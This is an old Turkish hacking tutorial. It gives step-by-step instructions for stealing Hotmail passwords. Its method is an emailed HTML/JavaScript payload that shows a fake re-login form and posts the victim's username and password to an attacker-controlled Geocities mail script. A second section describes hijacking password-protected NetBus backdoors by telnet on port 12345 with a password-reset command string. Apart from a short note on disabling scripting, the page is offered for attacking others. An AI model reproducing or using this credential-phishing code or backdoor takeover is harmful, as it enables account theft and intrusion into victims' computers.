Hotmail Hack 2

Geri Ana Sayfa Yukarı

 

HOTMAIL HACK

Microsoft'un ünlü ücretsiz e-mail sitesi hack edildi. Nasıl mı oluyor?

Kurbana Javascript codu içeren bir e-mail attıyorsunuz.Kurban bu e-mail'i görüntülediği zaman Javascript kodu devreye giriyor ve Kurbana tekrar Login olmasını söylüyor.Tabii böyle olunca size kurbanın kullanıcı adı ve ip adresini içeren bir e-mail geliyor.

Tabii siz kullanıcı adını ve sifresini öğrendiginiz zaman hesabın tam kullanım hakkını kazanıyorsunuz.silmek, okumak, kurban adına mailler göndermek... Tabii siz boş durmayıp POP Mail'leride kontrol ediyorsunuz ve kurbanın diğer sitelerdeki hesaplarının şifrelerini alıyorsunuz.

Peki bu olaydan kurtulamayacağız mı ??? .

Netscape kullanıcıları javascript ayarlarını söyle kapatabilir. (edit / preferences / advanced / disablejavascript).

Microsoft Internet Explorer kullanıcıları jscript ayarlarını su şekilde kapatabiliir. (view / internet options /security / custom settings / scripting / disable active scripting).

Tabii En Önemlisi Başkasının Hotmail Hesabını Nasıl Ele Geçiririz ???

Aşağidaki Listedekiler elimizde olmalı.

·        1 Internete bağlı bir bilgisayar... eh yani :-))

·        1 Netscape Mail (veya herhangi bir e-mail programı)

·        1 Notepad (veya herhangi bir text editor)

1.ADIM:

hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabı açtırıyoruz. Formu doldururken gerçek bilgilerimizi vermemize gerek yok. Rastgele birşeyler yazsakta olur.

2.ADIM:

Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabı açtırıyoruz. Formu doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adımda e-mail adresini kullandık.ve geocities'ten bir e-mail adresi aldık.örnegin(ybwc@geocities.com).

3.ADIM:

NotePad'imizi açıyoruz ve aşağıdaki text'i yazıyoruz. Daha sonra message.htm ismini verip kayıt ediyoruz. Satır 17'de Geocities kullanıcı adımız yazıyor. (ybwc) 2.adımda belirttigimiz gibi. (bu kullanıcı adını kendinize göre değiştirin.)


<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason:&nbsp;</font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\">&nbsp;<input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}

nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}

noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}

</script>
</body>
</html>

4.ADIM

kurbanızıma yeni bir e-mail mesaji hazırlayıp gönderiyoruz.örneğin: kurban, (victim@hotmail.com)olsun. E-mailimize message.htm dosyasınıda ekliyoruz ve gönderiyoruz.

5.ADIM

Kurbanımızın e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi zaman Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail alıyoruz. Tabii bu mail'de kurbanımızın kullanıcı adı, şifresi ve ip adresi oluyor...

Sifreli Netbus Kullanıcılarına Nasıl Girebilirim?

Sifreli Netbus Kullanıcılarına Nasıl Girebilirim?

2 Yöntem var bunlardan birincisi cok basit ikincisi biraz daha uzmanlik istiyor.


1. Yöntem : Sitemden indirmiş oldugunuz Netbushacker adlı program ile bunu yapmak çok kolay üstdeki bolüme kişinin ip numunu yazıyoruz sonra set ip diyoruz altdaki "change pass" bolümünün silikliği gidene kadar bekliyoruz sonra asağı tarafa yeni sifreyi yazıp giriyoruz.

2.)Yöntem Telnetle:

Telnet her windows'ta var..Bul dan telnet'i bulup çalıştırın.
Bağlana gelip uzaktaki sistem'e tıklayın
Ana bilgisyar adı: wingatede buldugumuz ipyi yazın
Bağlantı Noktası kısmına ise 12345 yazın ve bağlanın.

Sifreyi Sikmek için
Password;1;123 ServerPwd;phiberoptik
Yapıştırın.Sonra bir daha netbus'la girmeye çalışıyoruz sordugu şifreye dephiberoptik yazıyoruz